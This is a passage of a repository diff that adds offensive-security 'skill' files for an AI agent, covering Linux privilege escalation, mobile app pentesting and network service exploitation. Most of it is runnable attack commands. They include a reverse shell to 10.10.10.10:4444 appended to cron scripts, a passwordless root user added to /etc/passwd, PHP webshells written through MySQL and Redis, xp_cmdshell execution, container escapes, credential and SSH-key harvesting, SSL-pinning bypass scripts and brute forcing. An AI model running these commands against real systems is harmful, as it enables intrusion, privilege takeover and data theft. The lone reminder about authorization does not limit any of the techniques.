- Map network infrastructure
- Identify technologies in use
- Help with initial access techniques
Always ensure proper authorization before performing any reconnaissance activities.

568
skills/linux-privilege-escalation/SKILL.md Normal file
View File

@@ -0,0 +1,568 @@
---
name: escalating-linux-privileges
description: Escalate privileges on Linux systems using SUID/SGID binaries, capabilities, sudo misconfigurations, cron jobs, kernel exploits, and container escapes. Use when performing Linux post-exploitation or privilege escalation.
---
# Linux Privilege Escalation Skill
You are a Linux security expert specializing in privilege escalation techniques. Use this skill when the user requests help with:
- Escalating privileges on Linux systems
- Identifying misconfigurations and vulnerabilities
- Exploiting SUID/SGID binaries
- Abusing Linux capabilities
- Kernel exploitation
- Container escape techniques
- Sudo misconfigurations and bypasses
- Cron job exploitation
- Path hijacking attacks
## Core Methodologies
### 1. Initial System Enumeration
**System Information:**
```bash
# OS and kernel version
cat /proc/version
uname -a
lsb_release -a
cat /etc/os-release
# Check for kernel exploits
searchsploit "Linux Kernel $(uname -r)"
uname -r
# CPU and system stats
lscpu
cat /proc/cpuinfo
df -h
```
**Current User Context:**
```bash
# Who am I?
id
whoami
groups
sudo -l
# Environment variables (passwords, API keys?)
env
set
cat /proc/self/environ | tr '\0' '\n'
# Check PATH for hijacking opportunities
echo $PATH
```
**Users and Groups:**
```bash
# All users
cat /etc/passwd
cat /etc/passwd | grep -v "nologin\|false" | cut -d: -f1
# Users with bash
cat /etc/passwd | grep "/bin/bash"
# User details
cat /etc/shadow # If readable
cat /etc/group
# Home directories
ls -la /home/
```
### 2. Sudo Exploitation
**Check Sudo Permissions:**
```bash
# What can I run as root?
sudo -l
# Check sudo version for known vulns
sudo -V
sudo --version
```
**Common Sudo Misconfigurations:**
```bash
# NOPASSWD entries
sudo -l | grep NOPASSWD
# Wildcards exploitation
# If: (root) NOPASSWD: /bin/cp /tmp/* /var/www/html/
# Then: Create malicious file in /tmp, overwrite system files
# Shell escapes from sudo
# If you can run vim, less, more, man, etc. with sudo:
sudo vim -c ':!/bin/bash'
sudo less /etc/profile # then !/bin/bash
sudo awk 'BEGIN {system("/bin/bash")}'
sudo find . -exec /bin/bash \; -quit
sudo nmap --interactive # then !bash
```
**Sudo CVEs:**
```bash
# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2
sudoedit -s /
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# CVE-2019-14287 - Sudo < 1.8.28
# If: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash
# CVE-2019-18634 - Sudo pwfeedback
# Exploitable if pwfeedback is enabled in /etc/sudoers
```
**GTFOBins for Sudo:**
```bash
# Check https://gtfobins.github.io/ for specific binary
# Examples:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
sudo git -p help # then !/bin/bash
sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
### 3. SUID/SGID Binaries
**Find SUID/SGID Files:**
```bash
# Find SUID binaries (4000)
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Find SGID binaries (2000)
find / -perm -2000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
# Find both SUID and SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
# Interesting locations
find /usr/local/bin -perm -4000 2>/dev/null
find /usr/bin -perm -4000 2>/dev/null
find /bin -perm -4000 2>/dev/null
```
**Exploiting SUID Binaries:**
```bash
# Check GTFOBins for each SUID binary found
# https://gtfobins.github.io/
# Common exploitable SUID binaries:
# /usr/bin/find
find . -exec /bin/bash -p \; -quit
# /usr/bin/vim
vim -c ':py3 import os; os.execl("/bin/bash", "bash", "-pc", "reset; exec bash -p")'
# /usr/bin/nmap (old versions)
nmap --interactive
!sh
# /usr/bin/less
less /etc/profile
!/bin/bash
# /usr/bin/awk
awk 'BEGIN {system("/bin/bash -p")}'
# /usr/bin/perl
perl -e 'exec "/bin/bash";'
# /usr/bin/python
python -c 'import os; os.execl("/bin/bash", "bash", "-p")'
# /usr/bin/php
php -r "pcntl_exec('/bin/bash', ['-p']);"
# Custom SUID binary (check for command injection, buffer overflow)
strings /path/to/suid_binary
ltrace /path/to/suid_binary
strace /path/to/suid_binary
```
### 4. Linux Capabilities
**What Are Capabilities:**
Capabilities divide root privileges into distinct units. A binary with specific capabilities can perform privileged operations without full root.
**Enumerate Capabilities:**
```bash
# Find binaries with capabilities
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
# Check specific binary
getcap /usr/bin/python3.8
# Check process capabilities
cat /proc/self/status | grep Cap
getpcaps $$
# Decode capability value
capsh --decode=0000003fffffffff
```
**Exploitable Capabilities:**
```bash
# cap_setuid - allows changing UID
# Python with cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid
perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash";'
# cap_dac_read_search - bypass file read permission checks
# tar with cap_dac_read_search
tar cvf shadow.tar /etc/shadow
tar -xvf shadow.tar
# cap_chown - change file ownership
# Python with cap_chown
python -c 'import os; os.chown("/etc/shadow",1000,1000)'
# cap_sys_admin - various admin operations (often container escape)
# Can mount filesystems, load kernel modules, etc.
# cap_sys_ptrace - inject code into processes
# gdb with cap_sys_ptrace
gdb -p <PID>
call system("id")
# cap_sys_module - load kernel modules
# Can load malicious kernel module for root
# cap_net_raw + cap_net_admin - network packet manipulation
# tcpdump with these caps can be used for ARP spoofing
```
### 5. Cron Jobs Exploitation
**Enumerate Cron Jobs:**
```bash
# System-wide cron
cat /etc/crontab
ls -la /etc/cron.*
ls -la /etc/cron.d/
ls -la /var/spool/cron/
ls -la /var/spool/cron/crontabs/
# User crontabs
crontab -l
crontab -l -u username
# Check for running cron
ps aux | grep cron
systemctl status cron
```
**Exploiting Writable Cron Scripts:**
```bash
# If a cron script is writable
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cron/script.sh
# Wait for cron to execute
/tmp/rootbash -p
# Reverse shell payload
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >> /path/to/cron/script.sh
```
**PATH Exploitation in Cron:**
```bash
# If cron uses relative paths without full path
# Example: /etc/crontab contains: * * * * * root backup.sh
# Create malicious backup.sh in /tmp/ and modify PATH
echo '/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash"' > /tmp/backup.sh
chmod +x /tmp/backup.sh
```
**Wildcards in Cron:**
```bash
# If cron job has: tar czf /backup/backup.tar.gz *
# Create malicious files
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > exploit.sh
chmod +x exploit.sh
touch -- --checkpoint=1
touch -- --checkpoint-action=exec=exploit.sh
# When tar runs with wildcard, it executes exploit.sh
```
### 6. Writable Files and Directories
**Find Writable Files:**
```bash
# World-writable files
find / -writable -type f 2>/dev/null | grep -v "/proc/"
find / -perm -2 -type f 2>/dev/null
# Files owned by current user
find / -user $(whoami) 2>/dev/null
find / -group $(groups | cut -d' ' -f1) 2>/dev/null
# Writable /etc/ files (critical)
find /etc -writable -type f 2>/dev/null
```
**Critical Writable Files:**
```bash
# /etc/passwd - add root user
echo 'newroot::0:0:root:/root:/bin/bash' >> /etc/passwd
su newroot
# /etc/shadow - overwrite root hash
# Generate hash: openssl passwd -6 password
# Replace root line
# /etc/sudoers - add sudo permission
echo 'username ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
# /etc/crontab - add malicious cron
echo '* * * * * root /tmp/exploit.sh' >> /etc/crontab
# ~/.ssh/authorized_keys - add SSH key
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys
```
### 7. Kernel Exploits
**Identify Kernel Version:**
```bash
uname -a
cat /proc/version
uname -r
```
**Search for Exploits:**
```bash
# SearchSploit
searchsploit "Linux Kernel $(uname -r | cut -d'-' -f1)"
searchsploit "Linux Kernel 4.4"
# Google search
# Search: "Linux kernel X.X.X exploit"
# Search: "Linux kernel X.X.X privilege escalation"
# Automated tools
linux-exploit-suggester.sh
linux-exploit-suggester-2.pl
```
**Common Kernel Exploits:**
```bash
# DirtyCow (CVE-2016-5195) - Kernel <= 3.19.0-73.8
# https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
# CVE-2022-0847 (Dirty Pipe) - Kernel 5.8 - 5.16.11
# Overwrite read-only files
# CVE-2021-4034 (PwnKit) - PolicyKit
# Local privilege escalation via pkexec
# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2
# Compile and run
gcc -pthread exploit.c -o exploit -lcrypt
./exploit
```
**Kernel Exploit Resources:**
- https://github.com/lucyoa/kernel-exploits
- https://github.com/SecWiki/linux-kernel-exploits
- https://github.com/bwbwbwbw/linux-exploit-binaries
### 8. Container Escape
**Detect if in Container:**
```bash
# Check for .dockerenv
ls -la /.dockerenv
# Check cgroup
cat /proc/1/cgroup | grep docker
cat /proc/self/cgroup
# Check for container-specific files
ls -la /.containerenv # Podman
cat /proc/1/environ | grep container
```
**Container Escape Techniques:**
```bash
# Privileged container with access to /dev
# Mount host filesystem
fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host
# Docker socket mounted (/var/run/docker.sock)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Cap_sys_admin capability
# Can mount host filesystem or abuse other admin functions
# containerd/runc escape (CVE-2019-5736)
# Overwrite runc binary on host
# Kubernetes pod escape
# Service account tokens: /run/secrets/kubernetes.io/serviceaccount/
kubectl --token=$(cat /run/secrets/kubernetes.io/serviceaccount/token) get pods
```
### 9. Password Hunting
**Search for Passwords:**
```bash
# Grep for password strings
grep -r "password" /home/ 2>/dev/null
grep -r "passwd" /var/www/ 2>/dev/null
grep -ir "pwd\|pass" /opt/ 2>/dev/null
# Configuration files
cat /var/www/html/config.php
cat /var/www/html/wp-config.php
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.ssh/id_rsa
# Database files
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null
# Check environment
env | grep -i pass
# Check for credentials in scripts
find / -name "*.sh" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.py" -exec grep -l "password" {} \; 2>/dev/null
# Memory dumps
strings /dev/mem
strings /proc/kcore
# SSH keys
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
```
### 10. NFS Exploits
**Check NFS Shares:**
```bash
# On target
cat /etc/exports
showmount -e localhost
# From attacker machine
showmount -e 10.10.10.10
# Common misconfig: no_root_squash
# /home *(rw,no_root_squash)
```
**Exploit no_root_squash:**
```bash
# On attacker (as root)
mkdir /tmp/nfs
mount -t nfs 10.10.10.10:/home /tmp/nfs
cd /tmp/nfs
# Create SUID binary
cp /bin/bash .
chmod +s bash
# On target
cd /home
./bash -p # root shell
```
## Automated Enumeration Tools
**LinPEAS (Recommended):**
```bash
# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or locally
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```
**LinEnum:**
```bash
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
```
**Linux Smart Enumeration (LSE):**
```bash
wget https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
chmod +x lse.sh
./lse.sh -l1 # Level 1 (fast)
./lse.sh -l2 # Level 2 (thorough)
```
**pspy (Monitor Processes):**
```bash
# Monitor for cron jobs and processes without root
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64
```
## Troubleshooting
**Exploit Not Working:**
- Check architecture: `uname -m` (x86_64, i686, arm, etc.)
- Compile on target system if possible
- Check kernel version exactly matches exploit requirements
- Verify exploit is for correct Linux distribution
- Check for security mitigations (AppArmor, SELinux, ASLR)
**SUID Binary Not Spawning Root Shell:**
- Use `-p` flag to preserve privileges: `/bin/bash -p`
- Some shells drop privileges; try different shells
- Check if binary has capabilities instead of SUID
**Cannot Compile Exploit:**
- Transfer pre-compiled binary
- Cross-compile on attacker machine
- Use statically compiled binaries
- Check for gcc, g++, make on target
**Permission Denied Errors:**
- Check file permissions carefully
- Verify you're in correct group
- Check AppArmor/SELinux is not blocking
- Try different attack vector
## Reference Links
- HackTricks Linux Privesc: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/linux-hardening/privilege-escalation
- GTFOBins: https://gtfobins.github.io/
- PEASS-ng (LinPEAS): https://github.com/carlospolop/PEASS-ng
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
- Linux Privilege Escalation Techniques: https://book.hacktricks.xyz/linux-hardening/privilege-escalation
## When to Use This Skill
Activate this skill when the user asks to:
- Escalate privileges on a Linux system
- Enumerate Linux privilege escalation vectors
- Exploit SUID binaries or capabilities
- Abuse sudo misconfigurations
- Escape from containers
- Identify kernel exploits
- Find and exploit cron job weaknesses
- Analyze Linux security misconfigurations
Always ensure proper authorization before performing privilege escalation on any system.

438
skills/mobile-pentesting/SKILL.md Normal file
View File

@@ -0,0 +1,438 @@
---
name: testing-mobile-applications
description: Pentest Android and iOS mobile applications including APK analysis, dynamic analysis, SSL pinning bypass, root/jailbreak detection bypass, and mobile-specific vulnerabilities. Use when testing mobile app security or performing mobile pentesting.
---
# Testing Mobile Applications
## When to Use
- Android APK analysis and exploitation
- iOS application pentesting
- Mobile app security assessment
- Bypassing security controls (SSL pinning, root detection)
- Testing mobile-specific vulnerabilities
## Android Pentesting
### APK Analysis Tools
```bash
# Decompile APK
apktool d app.apk -o app_decompiled
# Convert DEX to JAR
d2j-dex2jar app.apk
# View JAR with JD-GUI
jd-gui app-dex2jar.jar
# Automated analysis
mobsf # Mobile Security Framework
jadx app.apk # APK to Java decompiler
```
### ADB (Android Debug Bridge)
```bash
# List devices
adb devices
# Connect over network
adb connect 192.168.1.100:5555
# Install APK
adb install app.apk
# Uninstall
adb uninstall com.package.name
# List packages
adb shell pm list packages
adb shell pm list packages | grep -i "keyword"
# Get APK path
adb shell pm path com.package.name
# Pull APK from device
adb pull /data/app/com.package.name-xxx/base.apk
# Start activity
adb shell am start -n com.package.name/.MainActivity
# View logs
adb logcat
# Shell access
adb shell
```
### Static Analysis
**Search for Sensitive Data:**
```bash
# Extract strings
strings app.apk | grep -i password
strings app.apk | grep -i api
strings app.apk | grep -i token
strings app.apk | grep -i key
# Search in decompiled code
grep -r "password" app_decompiled/
grep -r "http://" app_decompiled/
grep -r "api_key" app_decompiled/
```
**Check AndroidManifest.xml:**
```bash
# Decompile and view
apktool d app.apk
cat app_decompiled/AndroidManifest.xml
# Look for:
# - android:debuggable="true"
# - android:allowBackup="true"
# - Exported activities/services
# - Custom permissions
# - URL schemes
```
### Dynamic Analysis
**Frida (Runtime Instrumentation):**
```bash
# List running apps
frida-ps -U
# Attach to app
frida -U -n "App Name"
frida -U -f com.package.name
# Load script
frida -U -f com.package.name -l script.js
# Common scripts
# - Bypass SSL pinning
# - Bypass root detection
# - Hook functions
# - Dump memory
```
**SSL Pinning Bypass:**
```javascript
// Frida script - Universal SSL pinning bypass
Java.perform(function() {
var TrustManager = Java.use('javax.net.ssl.X509TrustManager');
TrustManager.checkServerTrusted.implementation = function() {};
var SSLContext = Java.use('javax.net.ssl.SSLContext');
SSLContext.init.overload('[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom').implementation = function(a,b,c) {
this.init.overload('[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom').call(this, a, null, c);
};
});
```
**Root Detection Bypass:**
```javascript
// Frida - Bypass root detection
Java.perform(function() {
var RootClass = Java.use('com.package.name.RootDetection');
RootClass.isRooted.implementation = function() {
return false;
};
});
```
### Intercepting Traffic
**Burp Suite Setup:**
```bash
# 1. Install Burp CA certificate
# Download from http://burp:8080 on device
# Install in Settings -> Security -> Install from storage
# 2. Configure proxy
adb shell settings put global http_proxy 192.168.1.100:8080
# 3. For apps with SSL pinning, use Frida bypass
# 4. Clear proxy when done
adb shell settings put global http_proxy :0
```
**mitmproxy:**
```bash
# Start mitmproxy
mitmproxy --listen-port 8080
# Install certificate on device
# http://mitm.it
# Set device proxy to attacker IP:8080
```
### Modifying and Repackaging APK
```bash
# 1. Decompile
apktool d app.apk -o app_mod
# 2. Modify smali code
# Edit files in app_mod/smali/
# 3. Recompile
apktool b app_mod -o app_modified.apk
# 4. Sign APK
# Generate keystore (first time only)
keytool -genkey -v -keystore my-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
# Sign
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-key.keystore app_modified.apk alias_name
# Or use uber-apk-signer
java -jar uber-apk-signer.jar -a app_modified.apk
# 5. Install
adb install app_modified.apk
```
### Common Vulnerabilities
**Insecure Data Storage:**
```bash
# Check shared preferences
adb shell
cd /data/data/com.package.name/shared_prefs/
cat *.xml
# Check databases
cd /data/data/com.package.name/databases/
sqlite3 database.db
.tables
SELECT * FROM users;
# Check files
cd /data/data/com.package.name/files/
ls -la
cat *
```
**Exported Components:**
```bash
# List exported activities
adb shell dumpsys package com.package.name | grep -A 20 "Activity"
# Start exported activity
adb shell am start -n com.package.name/.ExportedActivity
# Call exported service
adb shell am startservice -n com.package.name/.ExportedService
# Broadcast to receiver
adb shell am broadcast -a com.package.name.ACTION
```
**Insecure WebView:**
```bash
# Check for JavaScript enabled
# Look in code for:
webView.getSettings().setJavaScriptEnabled(true);
# Check for addJavascriptInterface
# Can lead to RCE if exposed
```
## iOS Pentesting
### Setup
**Jailbreak Tools:**
- checkra1n (iOS 12-14)
- unc0ver (iOS 11-14.8)
- Taurine (iOS 14-14.3)
**SSH Access:**
```bash
# Default credentials
ssh root@<device-ip>
# password: alpine
# Change default password!
passwd
```
### IPA Analysis
```bash
# Extract IPA
unzip app.ipa
# View binary
otool -L Payload/App.app/App
strings Payload/App.app/App
# Class dump
class-dump Payload/App.app/App > classes.txt
# Decrypt binary (on jailbroken device)
frida-ios-dump -u App
# Static analysis with Hopper/Ghidra
```
### Runtime Analysis
**Frida on iOS:**
```bash
# List apps
frida-ps -Ua
# Attach
frida -U -n "App Name"
frida -U -f com.company.app
# SSL pinning bypass (iOS)
objection -g "App Name" explore
ios sslpinning disable
```
**Objection:**
```bash
# Launch objection
objection -g com.company.app explore
# Common commands
ios info binary
ios hooking list classes
ios hooking search methods MainActivity
ios sslpinning disable
ios jailbreak disable
ios keychain dump
ios nsuserdefaults get
```
### File System Access
```bash
# Connect via SSH
ssh root@device-ip
# App data location
cd /var/mobile/Containers/Data/Application/<UUID>/
# Find app UUID
ipainstaller -l # List apps
ls /var/mobile/Containers/Data/Application/
# Common paths
Documents/
Library/
Library/Preferences/ # plist files
Library/Caches/
tmp/
```
### Keychain Access
```bash
# Using objection
ios keychain dump
# Manual (requires keychain-dumper on device)
./keychain_dumper
# Specific item
security find-generic-password -s "ServiceName"
```
### Common iOS Vulnerabilities
**Insecure Data Storage:**
```bash
# Check plist files
plutil -p Info.plist
# Check UserDefaults
ios nsuserdefaults get
# Check SQLite databases
sqlite3 database.db
.tables
SELECT * FROM sensitive_table;
```
**Binary Protections:**
```bash
# Check for PIE
otool -hv App | grep PIE
# Check for stack canaries
otool -I App | grep stack_chk
# Check for ARC
otool -I App | grep objc_release
```
## Mobile-Specific Attacks
**Deep Link Exploitation:**
```bash
# Android
adb shell am start -a android.intent.action.VIEW -d "app://open?param=value"
# iOS
xcrun simctl openurl booted "app://open?param=value"
```
**Intent Injection:**
```bash
# Send malicious intent
adb shell am start -n com.package/.Activity --es "extra_key" "malicious_value"
```
**Backup Extraction:**
```bash
# Android backup
adb backup -f backup.ab com.package.name
# Extract
java -jar abe.jar unpack backup.ab backup.tar
# iOS backup
idevicebackup2 backup --full backup_directory
```
## Tools
**Android:**
- APKTool - Decompile/recompile APKs
- dex2jar - Convert DEX to JAR
- JADX - APK to Java decompiler
- Frida - Dynamic instrumentation
- Objection - Frida-based toolkit
- MobSF - Automated analysis
- Drozer - Android security framework
**iOS:**
- Frida - Dynamic instrumentation
- Objection - Frida toolkit
- class-dump - Extract class info
- Hopper/Ghidra - Disassemblers
- frida-ios-dump - Decrypt binaries
- iproxy - Forward ports
## Quick Testing Workflow
1. **Static Analysis** - Decompile, search strings, analyze manifest/Info.plist
2. **Install** - Install on emulator/device
3. **Intercept Traffic** - Set up Burp/mitmproxy, bypass SSL pinning
4. **Dynamic Analysis** - Use Frida to hook functions, bypass protections
5. **Test Components** - Test exported components, deep links, intents
6. **Data Storage** - Check for insecure data storage in files/DB/keychain
7. **Repackage** - Modify and recompile to test additional scenarios
## References
- https://book.hacktricks.xyz/mobile-pentesting
- https://github.com/OWASP/owasp-mstg
- https://mobile-security.gitbook.io/

503
skills/network-service-enumeration/SKILL.md Normal file
View File

@@ -0,0 +1,503 @@
---
name: enumerating-network-services
description: Enumerate and exploit network services including SMB, FTP, SSH, RDP, HTTP, databases (MySQL, MSSQL, PostgreSQL, MongoDB), LDAP, NFS, DNS, and SNMP. Use when testing network service security or performing port-based exploitation.
---
# Network Service Enumeration Skill
You are a network penetration testing expert specializing in service enumeration and exploitation. Use this skill when the user requests help with:
- Enumerating network services by port
- Exploiting common network services (SMB, FTP, SSH, RDP, etc.)
- Database service testing (MySQL, MSSQL, PostgreSQL, MongoDB)
- Service-specific vulnerability identification
- Banner grabbing and version detection
- Network protocol analysis
## Core Methodologies
### 1. Port Scanning and Service Discovery
**Nmap Scanning Strategies:**
```bash
# Quick TCP scan
nmap -sC -sV -oA scan 10.10.10.10
# Full TCP port scan
nmap -p- -T4 10.10.10.10
nmap -p- -sV -sC -A 10.10.10.10 -oA full-scan
# UDP scan (top 1000)
sudo nmap -sU --top-ports 1000 10.10.10.10
# Aggressive scan
nmap -A -T4 10.10.10.10
# Specific port scan with scripts
nmap -p 445 --script smb-* 10.10.10.10
nmap -p 21 --script ftp-* 10.10.10.10
# Service version detection
nmap -sV --version-intensity 9 10.10.10.10
# OS detection
sudo nmap -O 10.10.10.10
```
**Fast Port Scanning:**
```bash
# masscan - very fast
masscan -p1-65535 10.10.10.10 --rate=1000
# rustscan - fast with nmap integration
rustscan -a 10.10.10.10 -- -sC -sV
```
### 2. SMB/SAMBA (Port 139, 445)
**Enumeration:**
```bash
# Nmap SMB scripts
nmap -p 445 --script smb-protocols 10.10.10.10
nmap -p 445 --script smb-security-mode 10.10.10.10
nmap -p 445 --script smb-enum-shares 10.10.10.10
nmap -p 445 --script smb-enum-users 10.10.10.10
# smbclient - list shares
smbclient -L //10.10.10.10 -N
smbclient -L //10.10.10.10 -U username
# smbmap
smbmap -H 10.10.10.10
smbmap -H 10.10.10.10 -u username -p password
smbmap -H 10.10.10.10 -u username -p password -R # Recursive listing
# enum4linux
enum4linux -a 10.10.10.10
enum4linux -U -M -S -P -G 10.10.10.10
# crackmapexec
crackmapexec smb 10.10.10.10
crackmapexec smb 10.10.10.10 -u '' -p '' # Null session
crackmapexec smb 10.10.10.10 -u username -p password --shares
crackmapexec smb 10.10.10.10 -u username -p password --users
```
**Connect to Shares:**
```bash
# smbclient
smbclient //10.10.10.10/share -U username
smbclient //10.10.10.10/share -N # Null session
# Mount SMB share
mount -t cifs //10.10.10.10/share /mnt/smb -o username=user,password=pass
# Download all files recursively
smbget -R smb://10.10.10.10/share -U username
```
**SMB Vulnerabilities:**
```bash
# EternalBlue (MS17-010)
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.10
# Other SMB vulns
nmap -p 445 --script smb-vuln-* 10.10.10.10
```
### 3. FTP (Port 21)
**Enumeration:**
```bash
# Connect anonymously
ftp 10.10.10.10
# user: anonymous, pass: anonymous
# Nmap FTP scripts
nmap -p 21 --script ftp-anon 10.10.10.10
nmap -p 21 --script ftp-bounce 10.10.10.10
nmap -p 21 --script ftp-brute 10.10.10.10
# Download all files
wget -r ftp://anonymous:anonymous@10.10.10.10/
```
**FTP Commands:**
```bash
# In FTP session
ls -la
cd directory
get filename # Download
mget * # Download multiple
put filename # Upload
binary # Set binary mode for binaries
```
### 4. SSH (Port 22)
**Enumeration:**
```bash
# Banner grab
nc 10.10.10.10 22
nmap -p 22 -sV 10.10.10.10
# Enumerate users
./ssh-user-enum.py --port 22 --userList users.txt 10.10.10.10
# Brute force (use carefully)
hydra -l root -P wordlist.txt ssh://10.10.10.10
```
**SSH Key Auth:**
```bash
# Connect with key
ssh -i id_rsa user@10.10.10.10
# Fix key permissions
chmod 600 id_rsa
# Generate SSH key pair
ssh-keygen -t rsa -b 4096
```
### 5. HTTP/HTTPS (Port 80, 443, 8080, 8443)
**Web Enumeration:**
```bash
# Whatweb - identify web technologies
whatweb http://10.10.10.10
# Nikto vulnerability scanner
nikto -h http://10.10.10.10
# Directory/file bruteforce
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u http://10.10.10.10 -w wordlist.txt
ffuf -u http://10.10.10.10/FUZZ -w wordlist.txt
# DNS subdomain enumeration
gobuster dns -d example.com -w subdomains.txt
ffuf -u http://FUZZ.example.com -w subdomains.txt
# Virtual host discovery
gobuster vhost -u http://10.10.10.10 -w vhosts.txt
```
**SSL/TLS Testing:**
```bash
# Check SSL certificate
openssl s_client -connect 10.10.10.10:443
# SSL vulnerabilities
nmap -p 443 --script ssl-* 10.10.10.10
testssl.sh https://10.10.10.10
```
### 6. RDP (Port 3389)
**Enumeration:**
```bash
# Nmap
nmap -p 3389 --script rdp-* 10.10.10.10
# Check if RDP is enabled
nmap -p 3389 -sV 10.10.10.10
```
**Connect:**
```bash
# rdesktop
rdesktop 10.10.10.10
# xfreerdp
xfreerdp /u:Administrator /p:password /v:10.10.10.10
xfreerdp /u:user /d:DOMAIN /v:10.10.10.10
```
**Brute Force:**
```bash
# hydra
hydra -l administrator -P passwords.txt rdp://10.10.10.10
# crowbar
crowbar -b rdp -s 10.10.10.10/32 -u admin -C passwords.txt
```
### 7. MySQL/MariaDB (Port 3306)
**Enumeration:**
```bash
# Nmap
nmap -p 3306 --script mysql-* 10.10.10.10
# Connect
mysql -h 10.10.10.10 -u root -p
mysql -h 10.10.10.10 -u root
```
**MySQL Commands:**
```sql
-- Show databases
SHOW DATABASES;
USE database_name;
-- Show tables
SHOW TABLES;
DESCRIBE table_name;
-- Read data
SELECT * FROM table_name;
SELECT user,password FROM mysql.user;
-- Read files (requires FILE privilege)
SELECT LOAD_FILE('/etc/passwd');
-- Write files
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
-- Command execution (UDF)
SELECT sys_exec('whoami');
```
### 8. MSSQL (Port 1433)
**Enumeration:**
```bash
# Nmap
nmap -p 1433 --script ms-sql-* 10.10.10.10
# Connect with impacket
mssqlclient.py user:password@10.10.10.10
mssqlclient.py user:password@10.10.10.10 -windows-auth # Windows auth
```
**MSSQL Commands:**
```sql
-- Version
SELECT @@version;
-- Databases
SELECT name FROM sys.databases;
-- Current user
SELECT USER_NAME();
SELECT SYSTEM_USER;
-- Check if sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Execute commands
EXEC xp_cmdshell 'whoami';
```
### 9. PostgreSQL (Port 5432)
**Connect:**
```bash
# psql
psql -h 10.10.10.10 -U postgres
psql -h 10.10.10.10 -U postgres -d database_name
# Nmap
nmap -p 5432 --script pgsql-* 10.10.10.10
```
**PostgreSQL Commands:**
```sql
-- List databases
\l
-- Connect to database
\c database_name
-- List tables
\dt
-- Current user
SELECT current_user;
-- Read files
CREATE TABLE demo(t text);
COPY demo FROM '/etc/passwd';
SELECT * FROM demo;
-- Command execution (requires superuser)
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'whoami';
SELECT * FROM cmd_exec;
```
### 10. MongoDB (Port 27017)
**Enumeration:**
```bash
# Nmap
nmap -p 27017 --script mongodb-* 10.10.10.10
# Connect
mongo 10.10.10.10
mongo 10.10.10.10/database
```
**MongoDB Commands:**
```javascript
// Show databases
show dbs
// Use database
use database_name
// Show collections
show collections
// Find documents
db.collection.find()
db.collection.find().pretty()
// Count documents
db.collection.count()
// Dump all data
db.collection.find().forEach(printjson)
```
### 11. Redis (Port 6379)
**Enumeration:**
```bash
# Connect
redis-cli -h 10.10.10.10
# Nmap
nmap -p 6379 --script redis-* 10.10.10.10
```
**Redis Exploitation:**
```bash
# In redis-cli
INFO # Server info
CONFIG GET dir # Get directory
CONFIG GET dbfilename
# Write SSH key
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
SET mykey "ssh-rsa AAAA..."
SAVE
# Write webshell
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SET mykey "<?php system($_GET['cmd']); ?>"
SAVE
```
### 12. LDAP (Port 389, 636)
**Enumeration:**
```bash
# Nmap
nmap -p 389 --script ldap-* 10.10.10.10
# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=local"
ldapsearch -x -H ldap://10.10.10.10 -D "user@domain.local" -w password -b "DC=domain,DC=local"
# Dump all
ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=local" "(objectClass=*)"
```
### 13. NFS (Port 2049)
**Enumeration:**
```bash
# Show exports
